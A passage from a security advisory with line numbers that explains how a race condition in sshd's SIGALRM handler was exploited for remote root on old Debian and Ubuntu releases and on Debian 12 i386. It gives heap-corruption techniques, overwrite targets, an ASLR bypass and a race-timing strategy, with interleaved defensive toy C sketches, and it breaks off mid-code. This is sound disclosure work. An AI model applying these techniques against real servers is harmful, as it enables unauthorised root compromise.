 170 | bug report (in OpenSSH's public Bugzilla), about a deadlock in sshd's
 171 | SIGALRM handler:
 172 | 
 173 |   https://bugzilla.mindrot.org/show_bug.cgi?id=3690
 174 | 
 175 | We therefore decided to contact OpenSSH's developers immediately (to let
 176 | them know that this deadlock is caused by an exploitable vulnerability),
 177 | we put our amd64 work on hold, and we started to write this advisory.
 178 | 
 179 | 
 180 | ========================================================================
 181 | SSH-2.0-OpenSSH_3.4p1 Debian 1:3.4p1-1.woody.3 (Debian 3.0r6, from 2005)
 182 | ========================================================================
 183 | 
 184 | ------------------------------------------------------------------------
 185 | Theory
 186 | ------------------------------------------------------------------------
 187 | 
 188 |     But that's not like me, I'm breaking free
 189 |         -- The Interrupters, "Haven't Seen the Last of Me"
 190 | 
 191 | The SIGALRM handler of this OpenSSH version calls packet_close(), which
 192 | calls buffer_free(), which calls xfree() and hence free(), which is not
 193 | async-signal-safe:
 194 | 
 195 | ------------------------------------------------------------------------
 196 |  302 grace_alarm_handler(int sig)
 197 |  303 {
 198 |  ...
 199 |  307         packet_close();
 200 | ------------------------------------------------------------------------
 201 |  329 packet_close(void)
 202 |  330 {
 203 |  ...
 204 |  341         buffer_free(&input);
 205 |  342         buffer_free(&output);
 206 |  343         buffer_free(&outgoing_packet);
 207 |  344         buffer_free(&incoming_packet);
 208 | ------------------------------------------------------------------------
 209 |  35 buffer_free(Buffer *buffer)
 210 |  36 {
 211 |  37         memset(buffer->buf, 0, buffer->alloc);
 212 |  38         xfree(buffer->buf);
 213 |  39 }
 214 | ------------------------------------------------------------------------
 215 |  51 xfree(void *ptr)
 216 |  52 {
 217 |  53         if (ptr == NULL)
 218 |  54                 fatal("xfree: NULL pointer given as argument");
 219 |  55         free(ptr);
 220 |  56 }
 221 | ------------------------------------------------------------------------
 222 | 
 223 | Consequently, we started to read the malloc code of this Debian's glibc
 224 | (2.2.5), to see if a first call to free() can be interrupted by SIGALRM
 225 | and exploited during a second call to free() inside the SIGALRM handler
 226 | (at lines 341-344, above). Because this glibc's malloc is not hardened
 227 | against the unlink() technique pioneered by Solar Designer in 2000, we
 228 | quickly spotted an interesting code path in chunk_free() (which is
 229 | called internally by free()):
 230 | 
 231 | ------------------------------------------------------------------------
 232 | 1028 struct malloc_chunk
 233 | 1029 {
 234 | 1030   INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */
 235 | 1031   INTERNAL_SIZE_T size;      /* Size in bytes, including overhead. */
 236 | 1032   struct malloc_chunk* fd;   /* double links -- used only if free. */
 237 | 1033   struct malloc_chunk* bk;
 238 | 1034 };
 239 | ------------------------------------------------------------------------
 240 | 2516 #define unlink(P, BK, FD)                                           \
 241 | 2517 {                                                                   \
 242 | 2518   BK = P->bk;                                                       \
 243 | 2519   FD = P->fd;                                                       \
 244 | 2520   FD->bk = BK;                                                      \
 245 | 2521   BK->fd = FD;                                                      \
 246 | 2522 }                                                                   \
 247 | ------------------------------------------------------------------------
 248 | 3160 chunk_free(arena *ar_ptr, mchunkptr p)
 249 | ....
 250 | 3164 {
 251 | 3165   INTERNAL_SIZE_T hd = p->size; /* its head field */
 252 | ....
 253 | 3177   sz = hd & ~PREV_INUSE;
 254 | 3178   next = chunk_at_offset(p, sz);
 255 | 3179   nextsz = chunksize(next);
 256 | ....
 257 | 3230   if (!(inuse_bit_at_offset(next, nextsz)))   /* consolidate forward */
 258 | 3231   {
 259 | ....
 260 | 3241       unlink(next, bck, fwd);
 261 | ....
 262 | 3244   }
 263 | 3245   else
 264 | 3246     set_head(next, nextsz);                  /* clear inuse bit */
 265 | ....
 266 | 3251     frontlink(ar_ptr, p, sz, idx, bck, fwd);
 267 | ------------------------------------------------------------------------
 268 | 
 269 | To exploit this code path, we arrange for sshd's heap to have the
 270 | following layout (chunk_X, chunk_Y, and chunk_Z are malloc()ated chunks
 271 | of memory, and p, s, f, b are their prev_size, size, fd, and bk fields):
 272 | 
 273 | -----|---+---------------|---+---------------|---+---------------|-----
 274 |  ... |p|s|f|b|  chunk_X  |p|s|f|b|  chunk_Y  |p|s|f|b|  chunk_Z  | ...
 275 | -----|---+---------------|---+---------------|---+---------------|-----
 276 |                              |<------------->|
 277 |                                  user data
 278 | 
 279 | - First, if a call to free(chunk_Y) is interrupted by SIGALRM *after*
 280 |   line 3246 but *before* line 3251, then chunk_Y is already marked as
 281 |   free (because chunk_Z's PREV_INUSE bit is cleared at line 3246) but it
 282 |   is not yet linked into its doubly-linked list (at line 3251): in other
 283 |   words, chunk_Y's fd and bk pointers still contain user data (attacker-
 284 |   controlled data).
 285 | 
 286 | - Second, if (inside the SIGALRM handler) packet_close() calls
 287 |   free(chunk_X), then the code block at lines 3230-3244 is entered
 288 |   (because chunk_Y is marked as free) and chunk_Y is unlink()ed (at line
 289 |   3241). This yields a so-called aa4bmo primitive (almost arbitrary 4
 290 |   bytes mirrored overwrite), because chunk_Y's fd and bk pointers are
 291 |   still attacker-controlled. For more information on the unlink()
 292 |   technique and the aa4bmo primitive:
 293 | 
 294 |   https://www.openwall.com/articles/JPEG-COM-Marker-Vulnerability#exploit
 295 |   http://phrack.org/issues/61/6.html#article
 296 | 
 297 | - Last, with this aa4bmo primitive we overwrite the glibc's __free_hook
 298 |   function pointer (this old Debian version does not have ASLR, nor NX)
 299 |   with the address of our shellcode in the heap, thus achieving remote
 300 |   code execution during the next call to free() in packet_close().
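
The "mirrored" nature of the unlink() writes described above can be seen in a toy model that never touches the real allocator. The sketch below is illustrative only: `struct toy_chunk`, `toy_unlink()`, and `toy_unlink_checked()` are hypothetical names, the struct merely imitates the four fields quoted earlier, and the checked variant shows the kind of neighbour-consistency test (FD->bk == P and BK->fd == P) that later glibc versions added to harden unlink.

```c
#include <assert.h>
#include <stddef.h>

/* Toy stand-in for a free chunk header; NOT glibc's allocator. */
struct toy_chunk {
    size_t prev_size;
    size_t size;
    struct toy_chunk *fd;
    struct toy_chunk *bk;
};

/* Unchecked unlink, mirroring the four statements of the quoted macro. */
static void toy_unlink(struct toy_chunk *p)
{
    struct toy_chunk *bk = p->bk;
    struct toy_chunk *fd = p->fd;
    fd->bk = bk;   /* first write: goes wherever p->fd points */
    bk->fd = fd;   /* second, "mirrored" write: goes wherever p->bk points */
}

/* Hardened variant: refuse to unlink unless both neighbours point back
 * at p. Returns 0 on success, -1 if the list looks corrupted. */
static int toy_unlink_checked(struct toy_chunk *p)
{
    if (p->fd->bk != p || p->bk->fd != p)
        return -1;
    toy_unlink(p);
    return 0;
}
```

On a well-formed circular list, `toy_unlink_checked()` succeeds and simply splices the node out. If a node's fd and bk point at two unrelated toy chunks, `toy_unlink()` still performs both writes into those objects, whereas `toy_unlink_checked()` returns -1 without writing anything.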
 301 | 
 302 | ------------------------------------------------------------------------
 303 | Practice
 304 | ------------------------------------------------------------------------
 305 | 
 306 |     Now they're taking over and they got complete control
 307 |         -- The Interrupters, "Liberty"
 308 | 
 309 | To mount this attack against sshd, we interrupt a call to free() inside
 310 | sshd's parsing code of a DSA public key (i.e., line 144 below is our
 311 | free(chunk_Y)) and exploit it during one of the free() calls in
 312 | packet_close() (i.e., one of the lines 341-344 above is our
 313 | free(chunk_X)):
 314 | 
 315 | ------------------------------------------------------------------------
 316 | 136 buffer_get_bignum2(Buffer *buffer, BIGNUM *value)
 317 | 137 {
 318 | 138         u_int len;
 319 | 139         u_char *bin = buffer_get_string(buffer, &len);
 320 | ...
 321 | 143         BN_bin2bn(bin, len, value);
 322 | 144         xfree(bin);
 323 | 145 }
 324 | ------------------------------------------------------------------------
 325 | 
 326 | Initially, however, we were never able to win this race condition (i.e.,
 327 | interrupt the free() call at line 144 at the right time). Eventually, we
 328 | realized that we could greatly improve our chances of winning this race:
 329 | the DSA public-key parsing code allows us to call free() four times (at
 330 | lines 704-707 below), and furthermore sshd allows us to attempt six user
 331 | authentications (AUTH_FAIL_MAX); if any one of these 24 free() calls is
 332 | interrupted at the right time, then we later achieve remote code
 333 | execution inside the SIGALRM handler.
 334 | 
 335 | ------------------------------------------------------------------------
 336 | 678 key_from_blob(u_char *blob, int blen)
 337 | 679 {
 338 | ...
 339 | 693         switch (type) {
 340 | ...
 341 | 702         case KEY_DSA:
 342 | 703                 key = key_new(type);
 343 | 704                 buffer_get_bignum2(&b, key->dsa->p);
 344 | 705                 buffer_get_bignum2(&b, key->dsa->q);
 345 | 706                 buffer_get_bignum2(&b, key->dsa->g);
 346 | 707                 buffer_get_bignum2(&b, key->dsa->pub_key);
 347 | ------------------------------------------------------------------------
 348 | 
 349 | With this improvement, we finally won the race condition after ~1 month:
 350 | we were happy (and did a root-shell dance), but we also felt that there
 351 | was still room for improvement.
 352 | 
 353 | ------------------------------------------------------------------------
 354 | Timing
 355 | ------------------------------------------------------------------------
 356 | 
 357 |     Don't worry, just wait and see
 358 |         -- The Interrupters, "Haven't Seen the Last of Me"
 359 | 
 360 | We therefore implemented the following threefold timing strategy:
 361 | 
 362 | - We do not wait until the last moment to send our (rather large) DSA
 363 |   public-key packet to sshd: instead, we send the entire packet minus
 364 |   one byte (the last byte) long before the LoginGraceTime, and send the
 365 |   very last byte at the very last moment, to minimize the effects of
 366 |   network delays. (And we disable the Nagle algorithm.)
 367 | 
 368 | - We keep track of the median round-trip time (by regularly sending
 369 |   packets that produce a response from sshd), and keep track of the
 370 |   difference between the moment we are expecting our connection to be
 371 |   closed by sshd (essentially the moment we receive the first byte of
 372 |   sshd's banner, plus LoginGraceTime) and the moment our connection is
 373 |   really closed by sshd, and accordingly adjust our timing (i.e., the
 374 |   moment when we send the last byte of our DSA packet).
 375 | 
 376 |   These time differences allow us to track clock skews and network
 377 |   delays, which show predictable patterns over time: we experimented
 378 |   with linear and spline regressions, but in the end, nothing worked
 379 |   better than simply re-using the most recent measurement. Possibly,
 380 |   deep learning might yield even better results; this is left as an
 381 |   exercise for the interested reader.
 382 | 
 383 | - More importantly, we further increase our chances of winning this race
 384 |   condition by slowly adjusting our timing through involuntary feedback
 385 |   from sshd:
 386 | 
 387 |   - if we receive a response (SSH2_MSG_USERAUTH_FAILURE) to our DSA
 388 |     public-key packet, then we sent it too early (sshd had the time to
 389 |     receive our packet in the unprivileged child, parse it, send it to
 390 |     the privileged child, parse it there, and send a response all the
 391 |     way back to us);
 392 | 
 393 |   - if we cannot even send the last byte of our DSA packet, then we
 394 |     waited too long (sshd already received the SIGALRM and closed our
 395 |     connection);
 396 | 
 397 |   - if we can send the last byte of our DSA packet, and receive no
 398 |     response before sshd closes our connection, then our timing was
 399 |     reasonably accurate.
 400 | 
 401 |   This feedback allows us to target what we call the "large" race
 402 |   window: hitting it does not guarantee that we win the race condition,
 403 |   but inside this large window are the 24 "small" race windows (inside
 404 |   the 24 free() calls) that, if hit, guarantee that we do win the race
 405 |   condition.
 406 | 
 407 | With these improvements, it takes ~10,000 tries on average to win this
 408 | race condition; i.e., with 10 connections (MaxStartups) accepted per 600
 409 | seconds (LoginGraceTime), it takes ~1 week on average to obtain a remote
 410 | root shell.
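
The "~1 week" figure follows from simple arithmetic on the numbers quoted above. As a rough sketch (the function name `expected_days()` is hypothetical, and the model assumes every batch of connections takes the full LoginGraceTime):

```c
#include <assert.h>

/* Expected wall-clock days needed for `tries` attempts when the server
 * accepts `conns` connections per `grace_seconds` window. */
static double expected_days(double tries, double conns, double grace_seconds)
{
    assert(conns > 0.0);
    double seconds = tries / conns * grace_seconds;
    return seconds / 86400.0;   /* 86400 seconds per day */
}
```

With the figures above, `expected_days(10000, 10, 600)` is 600,000 seconds, or roughly 6.9 days.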
 411 | 
 412 | 
 413 | ========================================================================
 414 | SSH-2.0-OpenSSH_4.2p1 Debian-7ubuntu3 (Ubuntu 6.06.1, from 2006)
 415 | ========================================================================
 416 | 
 417 | ------------------------------------------------------------------------
 418 | Theory, take one
 419 | ------------------------------------------------------------------------
 420 | 
 421 |     I sleep when the sun starts to rise
 422 |         -- The Interrupters, "Alien"
 423 | 
 424 | The SIGALRM handler of this OpenSSH version does not call packet_close()
 425 | anymore; moreover, this Ubuntu's glibc (2.3.6) always takes a mandatory
 426 | lock when entering the functions of the malloc family (even if single-
 427 | threaded like sshd), which prevents us from interrupting a call to one
 428 | of the malloc functions and later exploiting it during another call to
 429 | these functions (they would always deadlock). We must find another
 430 | solution.
 431 | 
 432 | CVE-2006-5051 mentions a double-free in GSSAPI, but GSSAPI (or Kerberos)
 433 | is not enabled by default, so this does not sound very appealing. On the
 434 | other hand, PAM is enabled by default, and pam_end() is called by sshd's
 435 | SIGALRM handler (and is, of course, not async-signal-safe). We therefore
 436 | searched for a PAM function that, if interrupted by SIGALRM at the right
 437 | time, would leave PAM's internal structures in an inconsistent state,
 438 | exploitable during pam_end() in the SIGALRM handler. We found
 439 | pam_set_data():
 440 | 
 441 | ------------------------------------------------------------------------
 442 |  33 int pam_set_data(
 443 |  34     pam_handle_t *pamh,
 444 |  ..
 445 |  37     void (*cleanup)(pam_handle_t *pamh, void *data, int error_status))
 446 |  38 {
 447 |  39     struct pam_data *data_entry;
 448 |  ..
 449 |  57     } else if ((data_entry = malloc(sizeof(*data_entry)))) {
 450 |  ..
 451 |  65         data_entry->next = pamh->data;
 452 |  66         pamh->data = data_entry;
 453 |  ..
 454 |  74     data_entry->cleanup = cleanup;
 455 | ------------------------------------------------------------------------
 456 | 
 457 | If this function is interrupted by SIGALRM *after* line 66 but *before*
 458 | line 74, then data_entry is already linked into PAM's structures (pamh),
 459 | but its cleanup field (a function pointer) is not yet initialized (since
 460 | the malloc() at line 57 does not initialize its memory). If we are able
 461 | to control cleanup (through leftovers from previous heap allocations),
 462 | then we can execute arbitrary code when pam_end() (inside the SIGALRM
 463 | handler) calls _pam_free_data() (at line 118):
 464 | 
 465 | ------------------------------------------------------------------------
 466 | 104 void _pam_free_data(pam_handle_t *pamh, int status)
 467 | 105 {
 468 | 106     struct pam_data *last;
 469 | 107     struct pam_data *data;
 470 | ...
 471 | 112     data = pamh->data;
 472 | 113 
 473 | 114     while (data) {
 474 | 115         last = data;
 475 | 116         data = data->next;
 476 | 117         if (last->cleanup) {
 477 | 118             last->cleanup(pamh, last->data, status);
 478 | ------------------------------------------------------------------------
 479 | 
 480 | This would have been an extremely simple exploit; unfortunately, we
 481 | completely overlooked that pam_set_data() can only be called from PAM
 482 | modules: if we interrupt it with SIGALRM, then pamh->caller_is is still
 483 | _PAM_CALLED_FROM_MODULE, in which case pam_end() returns immediately,
 484 | without ever calling _pam_free_data(). Back to the drawing board.
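
The ordering hazard discussed above (a node is linked into a list before all of its fields are set) can be illustrated with a toy list that does the opposite. This is a hedged sketch, not Linux-PAM code: `struct toy_entry`, `toy_push()`, `toy_free_all()`, and `toy_count_cleanup()` are hypothetical names, and initializing before linking does not by itself make such code async-signal-safe (the cleanup walk still calls free()).

```c
#include <assert.h>
#include <stdlib.h>

typedef void (*toy_cleanup_fn)(void *data);

struct toy_entry {
    struct toy_entry *next;
    void *data;
    toy_cleanup_fn cleanup;
};

/* Example callback: counts how many times cleanup ran. */
static void toy_count_cleanup(void *data)
{
    ++*(int *)data;
}

/* Fill in every field first, and only then link the node into the list. */
static int toy_push(struct toy_entry **head, void *data, toy_cleanup_fn cleanup)
{
    struct toy_entry *e = calloc(1, sizeof(*e)); /* zeroed, unlike malloc() */
    if (e == NULL)
        return -1;
    e->data = data;
    e->cleanup = cleanup;
    e->next = *head;
    *head = e;   /* link last: in program order, no half-built node is listed */
    return 0;
}

/* Walk the list the way a cleanup routine would, calling each callback. */
static void toy_free_all(struct toy_entry **head)
{
    struct toy_entry *e = *head;
    *head = NULL;
    while (e != NULL) {
        struct toy_entry *next = e->next;
        if (e->cleanup != NULL)
            e->cleanup(e->data);
        free(e);
        e = next;
    }
}
```

Because the node comes from calloc() and is linked only after `cleanup` is assigned, a walker never sees a stale function pointer left over from an earlier allocation.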
 485 | 
 486 | ------------------------------------------------------------------------
 487 | Theory, take two
 488 | ------------------------------------------------------------------------
 489 | 
 490 |     Not giving up, it's not what we do
 491 |         -- The Interrupters, "Title Holder"
 492 | 
 493 | We noticed that, at line 601 below, sshd passes a pointer to its global
 494 | sshpam_handle pointer directly to pam_start() (which is called once per
 495 | connection):
 496 | 
 497 | ------------------------------------------------------------------------
 498 |  202 static pam_handle_t *sshpam_handle = NULL;
 499 | ------------------------------------------------------------------------
 500 |  584 sshpam_init(Authctxt *authctxt)
 501 |  585 {
 502 |  ...
 503 |  600         sshpam_err =
 504 |  601             pam_start(SSHD_PAM_SERVICE, user, &store_conv, &sshpam_handle);
 505 | ------------------------------------------------------------------------
 506 | 
 507 | We therefore decided to look into pam_start() itself: if interrupted by
 508 | SIGALRM, it might leave the structure pointed to by sshpam_handle in an
 509 | inconsistent state, which could then be exploited inside the SIGALRM
 510 | handler, when "pam_end(sshpam_handle, sshpam_err)" is called.
 511 | 
 512 | ------------------------------------------------------------------------
 513 |  18 int pam_start (
 514 |  ..
 515 |  22     pam_handle_t **pamh)
 516 |  23 {
 517 |  ..
 518 |  32     if ((*pamh = calloc(1, sizeof(**pamh))) == NULL) {
 519 | ...
 520 | 110     if ( _pam_init_handlers(*pamh) != PAM_SUCCESS ) {
 521 | ------------------------------------------------------------------------
 522 |  319 int _pam_init_handlers(pam_handle_t *pamh)
 523 |  320 {
 524 |  ...
 525 |  398                 retval = _pam_parse_conf_file(pamh, f, pamh->service_name, PAM_T_ANY
 526 | ------------------------------------------------------------------------
 527 |   66 static int _pam_parse_conf_file(pam_handle_t *pamh, FILE *f
 528 |   ..
 529 |   73 {
 530 |  ...
 531 |  252             res = _pam_add_handler(pamh, must_fail, other
 532 | ------------------------------------------------------------------------
 533 |  581 int _pam_add_handler(pam_handle_t *pamh
 534 |  ...
 535 |  585 {
 536 |  ...
 537 |  755     the_handlers = (other) ? &pamh->handlers.other : &pamh->handlers.conf;
 538 |  ...
 539 |  767         handler_p = &the_handlers->authenticate;
 540 |  ...
 541 |  874     if ((*handler_p = malloc(sizeof(struct handler))) == NULL) {
 542 |  ...
 543 |  886     (*handler_p)->next = NULL;
 544 | ------------------------------------------------------------------------
 545 | 
 546 | At line 32, pam_start() immediately sets sshd's sshpam_handle to a
 547 | calloc()ated chunk of memory; this is safe, because calloc() initializes
 548 | this memory to zero. On the other hand, if _pam_add_handler() (which is
 549 | called multiple times by pam_start()) is interrupted by SIGALRM *after*
 550 | line 874 but *before* line 886, then a malloc()ated structure is linked
 551 | into pamh, but its next field is not yet initialized. If we are able to
 552 | control next (through leftovers from previous heap allocations), then we
 553 | can pass an arbitrary pointer to free() during the call to pam_end()
 554 | (inside the SIGALRM handler), at line 1020 (and line 1017) below:
 555 | 
 556 | ------------------------------------------------------------------------
 557 |  11 int pam_end(pam_handle_t *pamh, int pam_status)
 558 |  12 {
 559 |  ..
 560 |  31     if ((ret = _pam_free_handlers(pamh)) != PAM_SUCCESS) {
 561 | ------------------------------------------------------------------------
 562 |  925 int _pam_free_handlers(pam_handle_t *pamh)
 563 |  926 {
 564 |  ...
 565 |  954     _pam_free_handlers_aux(&(pamh->handlers.conf.authenticate));
 566 | ------------------------------------------------------------------------
 567 | 1009 void _pam_free_handlers_aux(struct handler **hp)
 568 | 1010 {
 569 | 1011     struct handler *h = *hp;
 570 | 1012     struct handler *last;
 571 | ....
 572 | 1015     while (h) {
 573 | 1016         last = h;
 574 | 1017         _pam_drop(h->argv);  /* This is all alocated in a single chunk */
 575 | 1018         h = h->next;
 576 | 1019         memset(last, 0, sizeof(*last));
 577 | 1020         free(last);
 578 | 1021     }
 579 | ------------------------------------------------------------------------
 580 | 
 581 | Because the malloc of this Ubuntu's glibc is already hardened against
 582 | the old unlink() technique, we decided to transform our arbitrary free()
 583 | into the Malloc Maleficarum's House of Mind (fastbin version): we free()
 584 | our own NON_MAIN_ARENA chunk, point our fake arena to sshd's .got.plt
 585 | (this Ubuntu's sshd has ASLR but not PIE), and overwrite _exit()'s entry
 586 | with the address of our shellcode in the heap (this Ubuntu's heap is
 587 | still executable by default). For more information on the Malloc
 588 | Maleficarum:
 589 | 
 590 |   https://seclists.org/bugtraq/2005/Oct/118
 591 | 
 592 | ------------------------------------------------------------------------
 593 | Practice
 594 | ------------------------------------------------------------------------
 595 | 
 596 |     I learned everything the hard way
 597 |         -- The Interrupters, "The Hard Way"
 598 | 
 599 | To mount this attack against sshd, we initially faced three problems:
 600 | 
 601 | - The House of Mind requires us to store the pointer to our fake arena
 602 |   at address 0x08100000 in the heap; but are we able to store attacker-
 603 |   controlled data at such a high address? Because sshd calls pam_start()
 604 |   at the very beginning of the user authentication, we do not control
 605 |   anything except the user name itself; luckily, a user name of length
 606 |   ~128KB (shorter than DEFAULT_MMAP_THRESHOLD) allows us to store our
 607 |   own data at address 0x08100000.
 608 | 
 609 | - The size field of our fake NON_MAIN_ARENA chunk must not be too large
 610 |   (to pass free()'s security checks); i.e., it must contain null bytes.
 611 |   But our long user name is a null-terminated string that cannot contain
 612 |   null bytes; luckily we remembered that _pam_free_handlers_aux() zeroes
 613 |   the structures that it free()s (line 1019 above): we therefore "patch"
 614 |   the size field of our fake chunk with such a memset(0), and only then
 615 |   free() it.
 616 | 
 617 | - We must survive several calls to free() (at lines 1017 and 1020 above)
 618 |   before the free() of our fake NON_MAIN_ARENA chunk. We transform these
 619 |   free()s into no-ops by pointing them to fake IS_MMAPPED chunks: free()
 620 |   calls munmap_chunk(), which calls munmap(), which fails because these
 621 |   fake IS_MMAPPED chunks are misaligned; effectively a no-op, because
 622 |   assert()ion failures are not enforced in this Ubuntu's glibc.
 623 | 
 624 | Finally, our long user name also allows us to control the potentially
 625 | uninitialized next field of 20 different structures (through leftovers
 626 | from temporary copies of our long user name), because pam_start() calls
 627 | _pam_add_handler() multiple times; i.e., our large race window contains
 628 | 20 small race windows.
 629 | 
 630 | ------------------------------------------------------------------------
 631 | Timing
 632 | ------------------------------------------------------------------------
 633 | 
 634 |     Same tricks they used before
 635 |         -- The Interrupters, "Divide Us"
 636 | 
 637 | For this attack against Ubuntu 6.06.1, we simply re-used the timing
 638 | strategy that we used against Debian 3.0r6: it takes ~10,000 tries on
 639 | average to win the race condition, and with 10 connections (MaxStartups)
 640 | accepted per 120 seconds (LoginGraceTime), it takes ~1-2 days on average
 641 | to obtain a remote root shell.
 642 | 
 643 | Note: because this Ubuntu's glibc always takes a mandatory lock when
 644 | entering the functions of the malloc family, an unlucky attacker might
 645 | deadlock all 10 MaxStartups connections before obtaining a root shell;
 646 | we have not tried to work around this problem because our ultimate goal
 647 | was to exploit a modern OpenSSH version anyway.
 648 | 
 649 | 
 650 | ========================================================================
 651 | SSH-2.0-OpenSSH_9.2p1 Debian-2+deb12u2 (Debian 12.5.0, from 2024)
 652 | ========================================================================
 653 | 
 654 | ------------------------------------------------------------------------
 655 | Theory
 656 | ------------------------------------------------------------------------
 657 | 
 658 |     Now you're ready, take the demons head on
 659 |         -- The Interrupters, "Be Gone"
 660 | 
 661 | The SIGALRM handler of this OpenSSH version calls neither packet_close()
 662 | nor pam_end(); in fact, it calls only one interesting function, syslog():
 663 | 
 664 | ------------------------------------------------------------------------
 665 |  358 grace_alarm_handler(int sig)
 666 |  359 {
 667 |  ...
 668 |  370         sigdie("Timeout before authentication for %s port %d",
 669 |  371             ssh_remote_ipaddr(the_active_state),
 670 |  372             ssh_remote_port(the_active_state));
 671 | ------------------------------------------------------------------------
 672 |  96 #define sigdie(...)             sshsigdie(__FILE__, __func__, __LINE__, 0, SYSLOG_LEVEL_ERROR, NULL, __VA_ARGS__)
 673 | ------------------------------------------------------------------------
 674 | 451 sshsigdie(const char *file, const char *func, int line, int showfunc,
 675 | 452     LogLevel level, const char *suffix, const char *fmt, ...)
 676 | 453 {
 677 | ...
 678 | 457         sshlogv(file, func, line, showfunc, SYSLOG_LEVEL_FATAL,
 679 | 458             suffix, fmt, args);
 680 | ------------------------------------------------------------------------
 681 | 464 sshlogv(const char *file, const char *func, int line, int showfunc,
 682 | 465     LogLevel level, const char *suffix, const char *fmt, va_list args)
 683 | 466 {
 684 | ...
 685 | 489         do_log(level, forced, suffix, fmt2, args);
 686 | ------------------------------------------------------------------------
 687 | 337 do_log(LogLevel level, int force, const char *suffix, const char *fmt,
 688 | 338     va_list args)
 689 | 339 {
 690 | ...
 691 | 419                 syslog(pri, "%.500s", fmtbuf);
 692 | ------------------------------------------------------------------------
 693 | 
 694 | Our two key questions, then, are: Does the syslog() of this Debian's
 695 | glibc (2.36) call async-signal-unsafe functions such as malloc() and
 696 | free()? And if yes, does this glibc still take a mandatory lock when
 697 | entering the functions of the malloc family?
 698 | 
 699 | - Luckily for us attackers, the answer to our first question is yes; if,
 700 |   and only if, the syslog() inside the SIGALRM handler is the very first
 701 |   call to syslog(), then __localtime64_r() (which is called by syslog())
 702 |   calls malloc(304) to allocate a FILE structure (at line 166) and calls
 703 |   malloc(4096) to allocate an internal read buffer (at line 186):
 704 | 
 705 | ------------------------------------------------------------------------
 706 |  28 __localtime64_r (const __time64_t *t, struct tm *tp)
 707 |  29 {
 708 |  30   return __tz_convert (*t, 1, tp);
 709 | ------------------------------------------------------------------------
 710 | 567 __tz_convert (__time64_t timer, int use_localtime, struct tm *tp)
 711 | 568 {
 712 | ...
 713 | 577   tzset_internal (tp == &_tmbuf && use_localtime);
 714 | ------------------------------------------------------------------------
 715 | 367 tzset_internal (int always)
 716 | 368 {
 717 | ...
 718 | 405   __tzfile_read (tz, 0, NULL);
 719 | ------------------------------------------------------------------------
 720 | 105 __tzfile_read (const char *file, size_t extra, char **extrap)
 721 | 106 {
 722 | ...
 723 | 109   FILE *f;
 724 | ...
 725 | 166   f = fopen (file, "rce");
 726 | ...
 727 | 186   if (__builtin_expect (__fread_unlocked ((void *) &tzhead, sizeof (tzhead),
 728 | 187                                           1, f) != 1, 0)
 729 | ------------------------------------------------------------------------
 730 | 
 731 |   Note: because we do not control anything about these malloc()ations
 732 |   (not their order, not their sizes, not their contents), we took the
 733 |   "rce" at line 166 as a much-needed good omen.
 734 | 
 735 | - And luckily for us, the answer to our second question is no; since
 736 |   October 2017, the glibc's malloc functions no longer take any lock
 737 |   when the process is single-threaded (like sshd):
 738 | 
 739 |   https://sourceware.org/git?p=glibc.git;a=commit;h=a15d53e2de4c7d83bda251469d92a3c7b49a90db
 740 |   https://sourceware.org/git?p=glibc.git;a=commit;h=3f6bb8a32e5f5efd78ac08c41e623651cc242a89
 741 |   https://sourceware.org/git?p=glibc.git;a=commit;h=905a7725e9157ea522d8ab97b4c8b96aeb23df54
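
The two requests mentioned above, malloc(304) and malloc(4096), are rounded up to chunk sizes by glibc before any free chunk is searched. The sketch below models that rounding under assumed i386 parameters that the text does not state: a 4-byte size field and 16-byte chunk alignment. The `TOY_` constants and `toy_request2size()` are hypothetical names that imitate glibc's request2size() macro.

```c
#include <assert.h>
#include <stddef.h>

/* Assumed i386 parameters (assumptions, not taken from the text). */
#define TOY_SIZE_SZ    4u    /* sizeof(size_t) on i386 */
#define TOY_ALIGN_MASK 15u   /* 16-byte chunk alignment, minus one */
#define TOY_MINSIZE    16u   /* smallest possible chunk */

/* Add the size-field overhead, then round up to the alignment. */
static size_t toy_request2size(size_t req)
{
    size_t padded = req + TOY_SIZE_SZ + TOY_ALIGN_MASK;
    if (padded < TOY_MINSIZE)
        return TOY_MINSIZE;
    return padded & ~(size_t)TOY_ALIGN_MASK;
}
```

Under these assumptions, the 304-byte request becomes a 320-byte chunk (consistent with the 320B "small hole" in the heap layout drawn later in this section), and the 4096-byte request becomes a 4112-byte chunk.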
 742 | 
 743 | Moreover, this Debian version suffers from the ASLR weakness described
 744 | in the following great blog posts (by Justin Miller and Mathias Krause,
 745 | respectively):
 746 | 
 747 |   https://zolutal.github.io/aslrnt/
 748 |   https://grsecurity.net/toolchain_necromancy_past_mistakes_haunting_aslr
 749 | 
 750 | Concretely, in the case of sshd on i386, every memory mapping is
 751 | randomized normally (sshd's PIE, the heap, most libraries, the stack),
 752 | but the glibc itself is always mapped either at address 0xb7200000 or at
 753 | address 0xb7400000; in other words, we can correctly guess the glibc's
 754 | address half of the time (a small price to pay for defeating ASLR). In
 755 | our exploit we assume that the glibc is mapped at address 0xb7400000,
 756 | because it is slightly more common than 0xb7200000.
 757 | 
 758 | Our next question is: which code paths inside the glibc's malloc
 759 | functions, if interrupted by SIGALRM at the right time, leave the heap
 760 | in an inconsistent state, exploitable during one of the malloc() calls
 761 | inside the SIGALRM handler?
 762 | 
 763 | We found several interesting (and surprising!) code paths, but the one
 764 | we chose involves only relative sizes, not absolute addresses (unlike
 765 | various code paths inside unlink_chunk(), for example); this difference
 766 | might prove crucial for a future amd64 exploit. This code path, inside
 767 | malloc(), splits a large free chunk (victim) into two smaller chunks;
 768 | the first chunk is returned to malloc()'s caller (at line 4345) and the
 769 | second chunk (remainder) is linked into an unsorted list of free chunks
 770 | (at lines 4324-4327):
 771 | 
 772 | ------------------------------------------------------------------------
 773 | 1449 #define set_head(p, s)       ((p)->mchunk_size = (s))
 774 | ------------------------------------------------------------------------
 775 | 3765 _int_malloc (mstate av, size_t bytes)
 776 | 3766 {
 777 | ....
 778 | 3798   nb = checked_request2size (bytes);
 779 | ....
 780 | 4295               size = chunksize (victim);
 781 | ....
 782 | 4300               remainder_size = size - nb;
 783 | ....
 784 | 4316                   remainder = chunk_at_offset (victim, nb);
 785 | ....
 786 | 4320                   bck = unsorted_chunks (av);
 787 | 4321                   fwd = bck->fd;
 788 | ....
 789 | 4324                   remainder->bk = bck;
 790 | 4325                   remainder->fd = fwd;
 791 | 4326                   bck->fd = remainder;
 792 | 4327                   fwd->bk = remainder;
 793 | ....
 794 | 4337                   set_head (victim, nb | PREV_INUSE |
 795 | 4338                             (av != &main_arena ? NON_MAIN_ARENA : 0));
 796 | 4339                   set_head (remainder, remainder_size | PREV_INUSE);
